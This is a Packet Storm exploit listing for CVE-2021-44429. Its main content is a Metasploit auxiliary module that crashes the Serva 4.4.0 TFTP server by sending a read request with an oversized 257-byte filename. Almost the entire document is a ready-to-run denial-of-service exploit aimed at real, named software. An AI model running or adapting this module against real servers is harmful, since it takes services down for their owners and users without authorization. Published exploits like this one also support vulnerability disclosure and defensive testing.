CVE-2021-44429: Serva 4.4.0 TFTP Remote Buffer Overflow ≈ Packet Storm

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)# Date: 2021-11-23# Exploit Author: Yehia Elghaly# Vendor Homepage: https://www.vercot.com/# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip# Tested Version: 4.4.0# Tested on: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Udp  include Msf::Auxiliary::Dos  Rank = ExcellentRanking  def initialize(info = {})    super(update_info(info,      'Name'           => 'Serva 4.4.0 TFTP Remote Buffer Overflow',      'Description'    => %q{        The Serva TFTP server version 4.4.0 can be        brought down by sending a special Read request.      },      'Author'         => 'Yehia Elghaly',      'License'        => MSF_LICENSE,      'DisclosureDate' => '2021-11-23'))    register_options([Opt::RPORT(69)])  end  def run    connect_udp    print_status("Sending Read request...")    sploit  = "\x00\x01"    sploit += "A" * 257    sploit += "\x00"    sploit += "netascii"    sploit += "\x00"    udp_sock.put(sploit)    disconnect_udp  endend